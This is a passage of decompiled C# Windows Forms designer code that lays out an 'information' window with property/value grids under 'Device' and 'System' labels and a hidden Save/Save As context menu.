			dataGridViewCellStyle11.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle11.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle11.SelectionBackColor = global::System.Drawing.SystemColors.Highlight;
			dataGridViewCellStyle11.SelectionForeColor = global::System.Drawing.SystemColors.HighlightText;
			dataGridViewCellStyle11.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGV1.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle11;
			this.DGV1.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.DisableResizing;
			this.DGV1.ColumnHeadersVisible = false;
			this.DGV1.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.DataGridViewTextBoxColumn1,
				this.Column6
			});
			dataGridViewCellStyle12.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle12.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle12.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle12.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			dataGridViewCellStyle12.SelectionBackColor = global::System.Drawing.Color.FromArgb(51, 153, 255);
			dataGridViewCellStyle12.SelectionForeColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle12.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGV1.DefaultCellStyle = dataGridViewCellStyle12;
			this.DGV1.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.DGV1.EditMode = global::System.Windows.Forms.DataGridViewEditMode.EditOnEnter;
			this.DGV1.EnableHeadersVisualStyles = false;
			this.DGV1.GridColor = global::System.Drawing.Color.FromArgb(42, 42, 42);
			this.DGV1.Location = new global::System.Drawing.Point(0, 291);
			this.DGV1.Name = "DGV1";
			this.DGV1.RowHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			this.DGV1.RowHeadersVisible = false;
			this.DGV1.ScrollBars = global::System.Windows.Forms.ScrollBars.None;
			this.DGV1.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGV1.Size = new global::System.Drawing.Size(358, 86);
			this.DGV1.TabIndex = 6;
			this.LB2.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 48);
			this.LB2.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.LB2.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			this.LB2.Location = new global::System.Drawing.Point(0, 267);
			this.LB2.Name = "LB2";
			this.LB2.Padding = new global::System.Windows.Forms.Padding(0, 0, 0, 4);
			this.LB2.Size = new global::System.Drawing.Size(358, 24);
			this.LB2.TabIndex = 5;
			this.LB2.Text = "System";
			this.LB2.TextAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.DGV0.AllowUserToAddRows = false;
			this.DGV0.AllowUserToDeleteRows = false;
			this.DGV0.AllowUserToResizeColumns = false;
			this.DGV0.AllowUserToResizeRows = false;
			this.DGV0.AutoSizeColumnsMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnsMode.Fill;
			this.DGV0.AutoSizeRowsMode = global::System.Windows.Forms.DataGridViewAutoSizeRowsMode.AllCells;
			this.DGV0.BackgroundColor = global::System.Drawing.Color.Black;
			this.DGV0.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.DGV0.CellBorderStyle = global::System.Windows.Forms.DataGridViewCellBorderStyle.None;
			this.DGV0.ColumnHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.None;
			dataGridViewCellStyle13.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle13.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle13.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle13.ForeColor = global::System.Drawing.Color.White;
			dataGridViewCellStyle13.SelectionBackColor = global::System.Drawing.SystemColors.Highlight;
			dataGridViewCellStyle13.SelectionForeColor = global::System.Drawing.SystemColors.HighlightText;
			dataGridViewCellStyle13.WrapMode = global::System.Windows.Forms.DataGridViewTriState.True;
			this.DGV0.ColumnHeadersDefaultCellStyle = dataGridViewCellStyle13;
			this.DGV0.ColumnHeadersHeightSizeMode = global::System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode.DisableResizing;
			this.DGV0.ColumnHeadersVisible = false;
			this.DGV0.Columns.AddRange(new global::System.Windows.Forms.DataGridViewColumn[]
			{
				this.Column1,
				this.Column2
			});
			dataGridViewCellStyle14.Alignment = global::System.Windows.Forms.DataGridViewContentAlignment.MiddleLeft;
			dataGridViewCellStyle14.BackColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle14.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			dataGridViewCellStyle14.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			dataGridViewCellStyle14.SelectionBackColor = global::System.Drawing.Color.FromArgb(51, 153, 255);
			dataGridViewCellStyle14.SelectionForeColor = global::System.Drawing.Color.Black;
			dataGridViewCellStyle14.WrapMode = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DGV0.DefaultCellStyle = dataGridViewCellStyle14;
			this.DGV0.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.DGV0.EditMode = global::System.Windows.Forms.DataGridViewEditMode.EditOnEnter;
			this.DGV0.EnableHeadersVisualStyles = false;
			this.DGV0.GridColor = global::System.Drawing.Color.FromArgb(42, 42, 42);
			this.DGV0.Location = new global::System.Drawing.Point(0, 24);
			this.DGV0.Name = "DGV0";
			this.DGV0.RowHeadersBorderStyle = global::System.Windows.Forms.DataGridViewHeaderBorderStyle.Single;
			this.DGV0.RowHeadersVisible = false;
			this.DGV0.ScrollBars = global::System.Windows.Forms.ScrollBars.None;
			this.DGV0.SelectionMode = global::System.Windows.Forms.DataGridViewSelectionMode.FullRowSelect;
			this.DGV0.Size = new global::System.Drawing.Size(358, 243);
			this.DGV0.TabIndex = 4;
			this.DGV0.Tag = "";
			this.LB1.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 48);
			this.LB1.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.LB1.ForeColor = global::System.Drawing.Color.FromArgb(190, 190, 190);
			this.LB1.Location = new global::System.Drawing.Point(0, 0);
			this.LB1.Name = "LB1";
			this.LB1.Padding = new global::System.Windows.Forms.Padding(0, 0, 0, 4);
			this.LB1.Size = new global::System.Drawing.Size(358, 24);
			this.LB1.TabIndex = 0;
			this.LB1.Text = "Device";
			this.LB1.TextAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.TOpacity.Interval = 1;
			this.Column1.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.Column1.FillWeight = 50f;
			this.Column1.HeaderText = "Property";
			this.Column1.Name = "Column1";
			this.Column1.ReadOnly = true;
			this.Column1.SortMode = global::System.Windows.Forms.DataGridViewColumnSortMode.NotSortable;
			this.Column2.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.Column2.FillWeight = 50f;
			this.Column2.HeaderText = "value";
			this.Column2.Name = "Column2";
			this.Column2.Resizable = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DataGridViewTextBoxColumn1.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.DataGridViewTextBoxColumn1.FillWeight = 50f;
			this.DataGridViewTextBoxColumn1.HeaderText = "Property";
			this.DataGridViewTextBoxColumn1.Name = "DataGridViewTextBoxColumn1";
			this.DataGridViewTextBoxColumn1.ReadOnly = true;
			this.DataGridViewTextBoxColumn1.SortMode = global::System.Windows.Forms.DataGridViewColumnSortMode.NotSortable;
			this.Column6.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.Column6.FillWeight = 50f;
			this.Column6.HeaderText = "value";
			this.Column6.Name = "Column6";
			this.Column6.Resizable = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DataGridViewTextBoxColumn2.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.DataGridViewTextBoxColumn2.FillWeight = 50f;
			this.DataGridViewTextBoxColumn2.HeaderText = "Property";
			this.DataGridViewTextBoxColumn2.Name = "DataGridViewTextBoxColumn2";
			this.DataGridViewTextBoxColumn2.ReadOnly = true;
			this.DataGridViewTextBoxColumn2.SortMode = global::System.Windows.Forms.DataGridViewColumnSortMode.NotSortable;
			this.Column5.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.Column5.FillWeight = 50f;
			this.Column5.HeaderText = "value";
			this.Column5.Name = "Column5";
			this.Column5.Resizable = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DataGridViewTextBoxColumn3.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.DataGridViewTextBoxColumn3.FillWeight = 50f;
			this.DataGridViewTextBoxColumn3.HeaderText = "Property";
			this.DataGridViewTextBoxColumn3.Name = "DataGridViewTextBoxColumn3";
			this.DataGridViewTextBoxColumn3.ReadOnly = true;
			this.DataGridViewTextBoxColumn3.SortMode = global::System.Windows.Forms.DataGridViewColumnSortMode.NotSortable;
			this.Column4.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.Column4.FillWeight = 50f;
			this.Column4.HeaderText = "value";
			this.Column4.Name = "Column4";
			this.Column4.Resizable = global::System.Windows.Forms.DataGridViewTriState.False;
			this.DataGridViewTextBoxColumn4.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.DataGridViewTextBoxColumn4.FillWeight = 50f;
			this.DataGridViewTextBoxColumn4.HeaderText = "Property";
			this.DataGridViewTextBoxColumn4.Name = "DataGridViewTextBoxColumn4";
			this.DataGridViewTextBoxColumn4.ReadOnly = true;
			this.DataGridViewTextBoxColumn4.SortMode = global::System.Windows.Forms.DataGridViewColumnSortMode.NotSortable;
			this.Column3.AutoSizeMode = global::System.Windows.Forms.DataGridViewAutoSizeColumnMode.Fill;
			this.Column3.FillWeight = 50f;
			this.Column3.HeaderText = "value";
			this.Column3.Name = "Column3";
			this.Column3.Resizable = global::System.Windows.Forms.DataGridViewTriState.False;
			this.ctxMenu.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
			{
				this.SaveToolStripMenuItem,
				this.SaveAsToolStripMenuItem
			});
			this.ctxMenu.Name = "ctxMenu";
			this.ctxMenu.ShowImageMargin = false;
			this.ctxMenu.Size = new global::System.Drawing.Size(156, 70);
			this.SaveToolStripMenuItem.Name = "SaveToolStripMenuItem";
			this.SaveToolStripMenuItem.Size = new global::System.Drawing.Size(155, 22);
			this.SaveToolStripMenuItem.Text = "Save";
			this.SaveToolStripMenuItem.Visible = false;
			this.SaveAsToolStripMenuItem.Name = "SaveAsToolStripMenuItem";
			this.SaveAsToolStripMenuItem.Size = new global::System.Drawing.Size(155, 22);
			this.SaveAsToolStripMenuItem.Text = "Save As";
			this.SaveAsToolStripMenuItem.Visible = false;
			base.AutoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
			base.AutoScaleMode = global::System.Windows.Forms.AutoScaleMode.Font;
			base.ClientSize = new global::System.Drawing.Size(375, 344);
			base.Controls.Add(this.Panel1);
			base.Name = "information";
			base.Opacity = 0.0;
			this.Text = "info";
			this.Panel1.ResumeLayout(false);
			((global::System.ComponentModel.ISupportInitialize)this.DGV6).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV5).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV4).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV3).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV2).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV1).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.DGV0).EndInit();
			this.ctxMenu.ResumeLayout(false);
			base.ResumeLayout(false);
		}

		// Token: 0x04000892 RID: 2194
		private global::System.ComponentModel.Container components;
	}
}
